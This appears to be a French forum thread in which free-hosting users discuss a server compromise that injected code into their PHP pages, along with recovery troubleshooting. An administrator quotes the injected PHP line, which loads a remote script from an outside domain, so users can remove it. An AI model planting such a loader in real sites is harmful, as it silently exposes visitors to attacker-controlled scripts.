Depuis hier j'ai quelques soucis avec mon forum, j'ai patienté un peu avant de dire que ça venais encore du serveur 2 mais bon...
http://www.frihost.com/forums/vt-34504.html
comme vousl'avaissurement lu, à ce que j'ai compris le serveur 2 s'estr fait hacké et par ce fait, des codes sources des hebergés ont été modifiés à leur insu...
j'avais fait une sauvegarde de mon forum, que me conseillez vous de faire? : de le suprimer de mon espace hebergé et d'upload une version propre ou de "nettoyer" la source des pages touchées?
et aussi; que me conseillez vous de faire pour ne pas que cela se reproduise? ( quel type de chmod parce que je ne comprend rien a ce truc )
merci d'avance
belette oui tu ferais mieux de prendre une version "neuve" si tu as une save , cela ira je pense
Décidément, le serveur 2 ne marchera jamais correctement^^
Lorsque j'ai vu tous les messages d'erreurs sur mon blog, j'ai cru que j'avais tout fait foirer ... Pourtant j'avais touché à rien.
Je comprends maintenant d'où venait le problème.
Lorsque j'ai vu les messages d'erreurs, j'ai contacté la personne qui m'aide quand je rencontre ce genre de problème.
Il a "réinstallé" mon blog. Je n'ai rien perdu. Pas un seul billet, rien des plugins que j'ai installés ...
Tout fonctionne correctement.
Par contre, une autre personne utilisant la même plate forme de blog que moi (Dotclear) et également hébergée sur Frihost rencontre toujours le problème. Son blog n'est même plus affiché!
Vous pensez que ça va se rétablir quand ?
si son probleme provient du meme probleme qui nous a touché, a mon avis c'est grillé pour lui vu que les pages sont "infectés", elles ne vont pas se réparer d'elle meme ...
( ou alors j'ai rien compris au probleme et je suis a coté de la plaque ^^ )
désole de ne pas avoir édité mais ça fera une sorte de up, au lieu de faire un new topic.
voila mon prob: suite au probleme survenu sur le serveur 2, mon forum ne marchait plus, j'ai donc tout supprimé et tout réupload (3h d'up, merci mon 56k). Hé bien ça marche toujours pas ...
ça me met :
Erreur !
Une erreur est survenue lors de l'action.
je ne peut plus me loguer dessus... ça craint a mort ...
c'est un forum pwsphp, que me proposez vous pour m'aider ?
merci d'avance!
en tout cas, moi j'ai seulement corriger les fichiers qui étaient touchés par le hacker et maintenant ça marche.
| beletteenrage wrote: |
désole de ne pas avoir édité mais ça fera une sorte de up, au lieu de faire un new topic.
voila mon prob: suite au probleme survenu sur le serveur 2, mon forum ne marchait plus, j'ai donc tout supprimé et tout réupload (3h d'up, merci mon 56k). Hé bien ça marche toujours pas ...
|
Si c'est le site que tu as mis comme "signature", moi je vois parfaitement bien ton forum...non c'est pas celui là.
c'est celui là :
www.belette.frih.net Super moche pour ceux qui utilisent le serveur #2 (Moi j'ai la chance d'être sur le 1 ) .
Sinon, je ne vois vraiment pas quel genre de personne peut hacker/envoyer un worm dans un serveur d'hébergement GRATUIT!
| pll wrote: |
Super moche pour ceux qui utilisent le serveur #2 (Moi j'ai la chance d'être sur le 1 ) .
Sinon, je ne vois vraiment pas quel genre de personne peut hacker/envoyer un worm dans un serveur d'hébergement GRATUIT! |
C'était plutôt un site vulnérable qui était hacké. Puis ce site a mis ce code sur tu les fichiers qu'ils pouvaient changer. Normalement 777 veut dire accessible à tout le monde sur le serveur. Le code injecté sure les pages semble être très fréquent sur l'internet, alors je ne crois pas que quelqu'un a voulu viser notre serveur en particulier.
J'ai maintenant essayé de changer les droits maintenant et ca ne devrait pas se passer de nouveau. Malheureusement la protection n'est pas complète.
Pour ceux qui ont des problèmes, veuillez me contacter avec pm ou dans la section support et j'essaierai de les résoudre.
Normalement ca devrait suffire d'effacer ce code des pages infectées.
| Code: |
| <? if (!defined('domainstat')) { define("domainstat", "ok"); echo "<script language='JavaScript' type='text/javascript' src='http://domainstat.net/stat.php?id=4fe6d'></script>";}?> |
Moi j'ai juste des messages d'avertissement sur mon blog ( http://tatablog.djb.frih.net/ ) bizare puis-ce que je ne l'ai pas touché depuis un moment. Et bien pour ceux qui doivent supprimer le code de leurs pages infectées, vous avez du pain sur la panche!
Ce code était sur toutes mes pages php.
Une personne a réinstallé tout mon blog. Je n'ai rien perdu. Mais je ne sais pas comment il a fait ...
| Code: |
| Warning: Cannot modify header information - headers already sent by (output started at /home/deejaybe/domains/djb.frih.net/public_html/tatablog/conf/config.php:68) in /home/deejaybe/domains/djb.frih.net/public_html/tatablog/index.php on line 46 |
deejay-bee, regarde deja a l'endroit qui est signalé (fichier index, ligne 46), ça se trouve tu verra tout de suite où est le probleme.
(a part ça, très sympatique ton blog!)
Oui, revenons a mon probleme !
j'ai TOUT supprimé, puis j'ai up une version propre, mais là je suis certain qu'elle est propre, j'ai fait de meme avec la base de données, pour en etre certain, et bien j'ai toujours ce probleme.
je vais essayer le code de nettoyage de bondings (punaise, fallait le dire que tu parlais fr, je me serai moins embeté quand je te demandais des trucs par mail, mdr)
si vraiment ça marche pas, je reinstallerai mon forum depuis 0... | Bondings wrote: |
| pll wrote: | Super moche pour ceux qui utilisent le serveur #2 (Moi j'ai la chance d'être sur le 1 ) .
Sinon, je ne vois vraiment pas quel genre de personne peut hacker/envoyer un worm dans un serveur d'hébergement GRATUIT! |
alors je ne crois pas que quelqu'un a voulu viser notre serveur en particulier. |
Oups ! Je croyais que si, alors bonne chance pour le remettre en place, si vous avez besoin d'aide je suis disponible (mais j'ai pas beaucoup de connaissances ...)j'ai voulu remettre une version propre de ma base de donnée, mais ça n'arrete pas de planter, j'en ai vraiment trop marre!
quand je l'insere d'un coup, ça l'envoie en mettant beaucoup de temps mais finalement ça plante.
alors j'ai décidé de l'envoyer morceaux par morceaux mais maintenant ça me fait ça :
| Code: |
Forbidden
You don't have permission to access /phpmyadmin/read_dump.php on this server.
Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request. |
(et j'ai meme pas fait 1/4 de ma bdd). Aidez moi! j'en ai trop marre de ce serv 2 qui ne m'aime pas! Beletteenrage, si tu mets la base de données sur ton site (mais pas dans le public_html 
), je veux bien le mettre en place moi-même. ok merci beaucoup, j'upload ça tout de suite 
